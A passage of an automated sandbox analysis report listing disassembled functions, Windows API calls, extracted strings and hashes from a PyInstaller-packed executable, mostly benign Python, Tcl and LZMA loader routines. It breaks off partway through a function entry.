                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9CE
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A9B8: GetLastError.KERNEL32(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9D8
                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7FF5A617C), ref: 00007FF7FF5A5F63
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3458911817-0
                                                                                                                                                                                                      • Opcode ID: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
                                                                                                                                                                                                      • Instruction ID: b6ef958c8ac94739bf6d8f76c05d987a231373268d83bf905ddb53313eeba5ea
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8517232A0968286E720FF35D8815E9E760BB49B84FC45235EA7D436D6DF3CE45187E0
                                                                                                                                                                                                      Function 00007FF7FF585820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF585830
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF585842
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF585879
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF58588B
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5858A4
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5858B6
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5858CF
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5858E1
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5858FD
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF58590F
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF58592B
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF58593D
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF585959
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF58596B
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF585987
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF585999
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5859B5
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5859C7
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressErrorLastProc
                                                                                                                                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                      • API String ID: 199729137-653951865
                                                                                                                                                                                                      • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                      • Instruction ID: bd9b1a2efc8007b7e2a5e0ca7d31ad65ae96febdde4dc04b6c5a29345f16109f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC228164A0AB8791FB15BB65A8141F4A7A0BF05B55FD55236C83E032E0FF3CA568C2F0
                                                                                                                                                                                                      Function 00007FF7FF5876B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressErrorLastProc
                                                                                                                                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                      • API String ID: 199729137-3427451314
                                                                                                                                                                                                      • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                      • Instruction ID: 0444685bfb9bbad97c277504d2f2ae55207c9f8b04a974173d826a585a9dc325
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69027B24A4EB87A1EB14BB65B8105F4AAA1BF05755BD41235D87E032E0FF7CB568C2F0
                                                                                                                                                                                                      Function 00007FFBBB612158 Relevance: 73.7, APIs: 12, Strings: 30, Instructions: 229COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Module_$Constant$FromType$LongModuleSpecType_$Err_ExceptionLong_StateTuple_With
                                                                                                                                                                                                      • String ID: CHECK_CRC32$CHECK_CRC64$CHECK_ID_MAX$CHECK_NONE$CHECK_SHA256$CHECK_UNKNOWN$Call to liblzma failed.$FILTER_ARM$FILTER_ARMTHUMB$FILTER_DELTA$FILTER_IA64$FILTER_LZMA1$FILTER_LZMA2$FILTER_POWERPC$FILTER_SPARC$FILTER_X86$FORMAT_ALONE$FORMAT_AUTO$FORMAT_RAW$FORMAT_XZ$MF_BT2$MF_BT3$MF_BT4$MF_HC3$MF_HC4$MODE_FAST$MODE_NORMAL$PRESET_DEFAULT$PRESET_EXTREME$_lzma.LZMAError
                                                                                                                                                                                                      • API String ID: 2860262105-730042774
                                                                                                                                                                                                      • Opcode ID: b05d20caf41e2cf34902a231f2e1464577aae0624dd5c380810d4ef201983af2
                                                                                                                                                                                                      • Instruction ID: 46e038c4b7a29cafa4992f2928e7c446838d5ac24b12a4bc67248eea80fe410d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b05d20caf41e2cf34902a231f2e1464577aae0624dd5c380810d4ef201983af2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12A10BE5B19A5251E618DB3AEDA03B5B651FF04784B80F034CF1F86675EE2DF908CA18
                                                                                                                                                                                                      Function 00007FFBBCD47BDC Relevance: 58.1, APIs: 4, Strings: 29, Instructions: 381COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                      • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                                                                                                                                                                      • API String ID: 2943138195-1482988683
                                                                                                                                                                                                      • Opcode ID: a2c27aef857a1be5b859030660f08b7ca73635be6048625c1ed2e335bbf60e8e
                                                                                                                                                                                                      • Instruction ID: 50abbf725405befb663302b22d33a94f2862cd2e359a5c9e537b79c9acc3ce65
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2c27aef857a1be5b859030660f08b7ca73635be6048625c1ed2e335bbf60e8e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B025BEAF18A12C8FB15DB7CD8582BC2BA0BB05384F514136DB0D56A98EF3DA945C358
                                                                                                                                                                                                      Function 00007FFBBCD4B64C Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                      • String ID: `anonymous namespace'
                                                                                                                                                                                                      • API String ID: 2943138195-3062148218
                                                                                                                                                                                                      • Opcode ID: aec32b62843f06ec98af653d191f262bc38b8bb7144c10d1108c11b28ce6cb84
                                                                                                                                                                                                      • Instruction ID: 8b7746711e70173e4b9c2b0cff7de32cf36c294e9edbb5f462a0f531c4bbfda7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: aec32b62843f06ec98af653d191f262bc38b8bb7144c10d1108c11b28ce6cb84
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1E187FAB08B82A9EB10CF38E4882AC77A0FB54788F445135EB8D17A95DF78E555C704
                                                                                                                                                                                                      Function 00007FFBBB6071F0 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 156threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Dealloc$Err_LongString$Bytes_FromLong_ModuleOccurredSizeStateThread_allocate_lockType_Unsigned
                                                                                                                                                                                                      • String ID: Cannot specify filters except with FORMAT_RAW$Cannot specify memory limit with FORMAT_RAW$Invalid container format: %d$Must specify filters for FORMAT_RAW$Unable to allocate lock
                                                                                                                                                                                                      • API String ID: 553332449-1518367256
                                                                                                                                                                                                      • Opcode ID: 1d80853906ed9ca39a4ccfc58220e474bd357f26f86dbdbab1004e32ec781117
                                                                                                                                                                                                      • Instruction ID: c63c7ca0fc15231a4895459e2c1ab90a8a4c058d2d7cf894897b8a06f7b3894e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d80853906ed9ca39a4ccfc58220e474bd357f26f86dbdbab1004e32ec781117
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7611BA1A08A4384EF6C8F3AEC94279B295BF45B94F849131DF1F162B4DE3CEC459308
                                                                                                                                                                                                      Function 00007FF7FF5881C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF589400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7FF5845E4,00000000,00007FF7FF581985), ref: 00007FF7FF589439
                                                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7FF5888A7,?,?,00000000,00007FF7FF583CBB), ref: 00007FF7FF58821C
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF582810: MessageBoxW.USER32 ref: 00007FF7FF5828EA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                      • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                      • API String ID: 1662231829-930877121
                                                                                                                                                                                                      • Opcode ID: edc9664b33811758d6c916b667f63e3a61f1ee376c3ece4c7328d7709112d215
                                                                                                                                                                                                      • Instruction ID: c840423aa0d0a90424b34485ed5f33c9943444137dfb87d24c9494e46243a34a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: edc9664b33811758d6c916b667f63e3a61f1ee376c3ece4c7328d7709112d215
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC519411A19AC291FB50BB25E8516FAE291FF94781FC84231E93F876D5EE2CE504C7E0
                                                                                                                                                                                                      Function 00007FFBBCD4C4B4 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 359COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: NameName::$Name::operator+atolswprintf_s
                                                                                                                                                                                                      • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                                                                                                                                                                                                      • API String ID: 2331677841-2441609178
                                                                                                                                                                                                      • Opcode ID: 3c29747ae8710b15564f16d6c1c734fd538530989b0780686262821ebccf47fd
                                                                                                                                                                                                      • Instruction ID: 7fc30ab5483649d346beaf379a19c1460e6b28f7ced6f0384bf7dd524d9e38f2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c29747ae8710b15564f16d6c1c734fd538530989b0780686262821ebccf47fd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57F18FFAF0864285FB14DB7CC99C1BC27A1AF84744F944136DB8E26A95EF3CA945C348
                                                                                                                                                                                                      Function 00007FF7FF581600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                      • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                      • API String ID: 2050909247-1550345328
                                                                                                                                                                                                      • Opcode ID: 494fcd5394cd439dcfaf7b05fa2bab2aad16b02dc3babc062f03d62e9b1140d8
                                                                                                                                                                                                      • Instruction ID: 42583fd67a5256244861b10729d7d39e3ba4584d00640a868a6a934d15417087
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 494fcd5394cd439dcfaf7b05fa2bab2aad16b02dc3babc062f03d62e9b1140d8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D519A21A096C392EB14BB2294401EAA3A0BF41B94FC44735EE7D47BE6DE3CE555C7E0
                                                                                                                                                                                                      Function 00007FFBBB610708 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 107COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_LongMem_String$Arg_CallocDeallocFreeItemKeywordsLong_Mapping_OccurredOptionalParseTupleUnsigned
                                                                                                                                                                                                      • String ID: Invalid compression preset: %u$Invalid filter specifier for LZMA filter$preset$|OOO&O&O&O&O&O&O&O&
                                                                                                                                                                                                      • API String ID: 462412801-1461672608
                                                                                                                                                                                                      • Opcode ID: 868b533cc0c448d37309dcaeb519738a4885eb3ce6cb3332c7740bc17e887e02
                                                                                                                                                                                                      • Instruction ID: 201092fbe2d9abe56a94d59cd76e4de536d9d59a35c6c8c8bc31a77093c02f69
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 868b533cc0c448d37309dcaeb519738a4885eb3ce6cb3332c7740bc17e887e02
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9510DB1A08B4285EB648F29E8402B9B3A4FB88B94F549136DB8E03B74DF3CD955D744
                                                                                                                                                                                                      Function 00007FFBBB610B50 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 143threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
